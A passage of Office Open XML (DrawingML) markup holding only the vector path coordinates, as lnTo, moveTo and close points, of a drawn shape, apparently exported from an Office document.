                    <a:pt x="3528" y="3917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3438" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3360" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244" y="3869"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3202" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3412" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3438" y="3811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3817"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3779" y="4956"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3548" y="4893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="4846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3317" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328" y="4693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="4604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344" y="4509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344" y="4421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="4332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3328" y="4237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3297" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3375" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3449" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3596" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3601" y="4105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3606" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3628" y="4153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3638" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3654" y="4168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="4179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="4179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3764" y="4326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3827" y="4479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3874" y="4630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3858" y="4799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3837" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3816" y="4835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3801" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4956"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2698" y="4174"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="4132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2976" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023" y="4132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3155" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270" y="4226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="4315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="4667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3191" y="4709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3034" y="4589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960" y="4526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2887" y="4457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="4310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4174"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3223" y="3979"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3223" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861" y="4042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2793" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2724" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2640" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="3964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="3854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="3785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="3785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3191" y="3880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3223" y="3979"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4220" y="4856"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4184" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4068" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3953" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3953" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3942" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3926" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3926" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="5077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011" y="5066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="5056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="5019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4079" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4158" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4189" y="4883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4189" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4158" y="4898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4121" y="4919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="4835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011" y="4804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3984" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="4704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3932" y="4620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3890" y="4457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864" y="4379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="4300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="4221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3758" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969" y="4205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4052" y="4252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="4237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3748" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3706" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="3885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="3727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="3707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="3696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3464" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3522" y="3460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3543" y="3418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3564" y="3323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3564" y="3281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3548" y="3360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3507" y="3439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3481" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3444" y="3523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381" y="3554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270" y="3497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213" y="3444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="3391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081" y="3344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950" y="3260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="3119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2672" y="3097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2703" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="3134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609" y="3124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="3155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2966" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="3497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123" y="3597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3013" y="3423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="3323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023" y="3801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2897" y="3859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603" y="3932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2582" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="3801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="3707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388" y="3512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388" y="3413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2425" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2378" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362" y="3418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357" y="3517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="3617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="3938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2283" y="4053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1690" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
